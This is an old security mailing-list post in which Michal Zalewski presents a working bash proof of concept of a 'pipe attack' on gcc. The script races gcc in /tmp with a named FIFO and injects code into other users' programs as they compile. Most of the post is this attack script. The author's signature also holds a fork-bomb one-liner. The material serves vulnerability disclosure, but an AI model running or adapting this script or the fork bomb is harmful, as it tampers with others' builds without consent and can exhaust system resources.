Pipe attack - an example

[lcamtuf () BOSS STASZIC WAW PL (Micha? Zalewski)]

Due to the questions about possibility of performing 'pipe attacks'
- there's *working* example of program, which appends function
printf("This program has been infected!\n"); after declarations
in the main() function to sources compiled using gcc. That IS serious
problem, isn't it? Of course, of course, this one (gcc vunerability)
can be easily patched, but gcc isn't the only one vunerable program!
Ok, here it is:

--
#!/bin/bash
# Advanced gcc viral implant
# by Michal Zalewski (lcamtuf () staszic waw pl)
# ** EXECUTION PROHIBITED **

CC1=`find /usr/lib/gcc-lib -name cc1`
VICT=0
renice +20 $PPID >&/dev/null
cd /tmp
echo "I'm free, I'm free! Oh, I'm free..."
while:; do
  V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."`
  if [ ! "$V" = "" ]; then
    mkfifo -m 666 ${V}.s &>/dev/null
    if [ -p ${V}.s ]; then
      sleep 1
      cat ${V}.i|awk 'match($2,"main")==1{x=1};y!=1&&x==1&&match($1,"(">0){y=1;print "printf(\"This program has been 
infected!\\n\");"};{print $0}'>.lv$$.i
      $CC1 .lv$$.i
      cat ${V}.s>/dev/null
      cat .lv$$.s >${V}.s
      let VICT=VICT+1
      echo "Someone has been just trapped ($VICT)."
    fi
    rm -f .lv$$.* ${V}.s &>/dev/null
  fi
done
--

_______________________________________________________________________
Micha³ Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl]
Iterowaæ jest rzecz± ludzk±, wykonywaæ rekursywnie - bosk± [P. Deustch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=